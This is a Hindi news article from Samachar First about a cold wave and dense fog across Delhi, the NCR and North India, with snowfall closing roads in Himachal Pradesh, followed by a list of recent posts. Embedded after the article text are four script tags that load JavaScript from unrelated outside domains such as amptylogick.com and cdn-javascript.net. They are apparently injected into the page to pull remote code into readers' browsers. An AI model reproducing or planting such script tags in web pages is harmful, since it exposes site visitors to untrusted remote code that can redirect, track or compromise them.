Categories: इंडिया

दिल्ली समेत पूरे उत्तर भारत में ठंड का प्रकोप जारी

<p>दिल्ली समेत पूरे उत्तर भारत में ठंड का प्रकोप देखा जा रहा है। दिल्ली में आज भी ठंड बनी हुई है। दिल्ली में न्यूनतम तापमान 6.7 डिग्री रिकॉर्ड किया गया। इसके साथ ही ठंड से लोगों की परेशानी बढ़ती जा रही है। जानकारी के अनुसार इससे पहले बुधवार को मौसम की सबसे सर्द सुबह रही। मौसम विभाग के अनुसार दिल्ली का तापमान बुधवार सुबह 7 डिग्री सेल्सियस दर्ज किया गया। इससे पहले मंगलवार को दिल्ली में अधिकतम तापमान 12.9 डिग्री सेल्सियस दर्ज किया गया था, जो कि पिछले 16 सालों में दिसंबर में सबसे कम तापमान रहा।</p>

<p>लोगों को घर से बाहर निकलने में परेशानी हो रही है। बेघर लोगों को ज्यादा परेशानी है क्योंकि ठंड से बचने के उनके पास बेहतर प्रबंध नहीं हैं। बच्चों को भी स्कूल आने-जाने में परेशानी देखी जा रही है। सिर्फ दिल्ली ही नहीं, बल्कि इससे सटे नोएडा, गाजियाबाद, फरीदाबाद और गुरुग्राम भी ठंड की चपेट में हैं। शनिवार को दिल्ली और एनसीआर को कोहरे ने अपने आगोश में ले लिया। दिल्ली, नोएडा, गुरुग्राम, फसाफरीदाबाद समेत कई इलाकों में शनिवार सुबह घना कोहरा छाया रहा। कोहरे की धुंध की वजह से सूरज दिखाई नहीं दे रहा था। बाद में दिन में धुंधलका छंटा और लोगों ने राहत की सांस ली।</p>

<p>वहीं, हिमाचल में भी पहाड़ों पर लगातार बर्फबारी के चलते कई दिनों से कोहरा, गलन और शीतलहर का असर मैदानी क्षेत्रों में दिखाई दे रहा है। दिन निकलने की शुरुआत कोहरे के साथ शीतलहर से हो रही है। हिमाचल में आज से एक सप्ताह तक मौसम साफ रहेगा। बीती रात बर्फ़बारी से जलोडी दर्रा, भरमौर-जोत और किलाड़-जम्मू मार्ग फिर बंद हो गए है। मौसम विज्ञान केंद्र शिमला ने रविवार से प्रदेश में मौसम 27 दिसंबर तक धुप खिलने का पूर्वानुमान लगाया है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1576990018844″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

3 mins ago

प्रमोशन लिस्ट के इंतजार में कई शिक्षक बिना प्रिंसिपल बने होंगे रिटायर

  वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…

50 mins ago

अनुष्का दत्ता पहुंची मिस यूनिवर्स इंडिया-2024 के फाइनल में, हिमाचल की पहली प्रतिभागी

  Shimla: रोह‍डू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…

1 hour ago

मस्जिद विवाद के बीच विक्रमादित्य की वक्फ बोर्ड में सुधार की नस‍ीहत

Shimla:हिमाचल और हिमाचलियत के हित सर्वश्रेष्ठ, सर्वत्र हिमाचल का संपूर्ण विकास। समय के साथ हर…

2 hours ago

कंगना का मंडी प्रेम: ‘यह मेरा घर है, यहां काम करूंगी

Manali: मशहूर अभिनेत्री कंगना रनौत ने  मनाली की यात्रा के दौरान अपने गृहनगर और लोगों…

2 hours ago

Survey: लेनदेन शुल्क लगा तो UPIका इस्तेमाल बंद कर देगे 75% उपयोगकर्ता

  New Delhi:लोकलसर्किल्स ने रविवार को एक सर्वेक्षण निष्कर्ष निकाला है। जिसमें दावा किया गया…

6 hours ago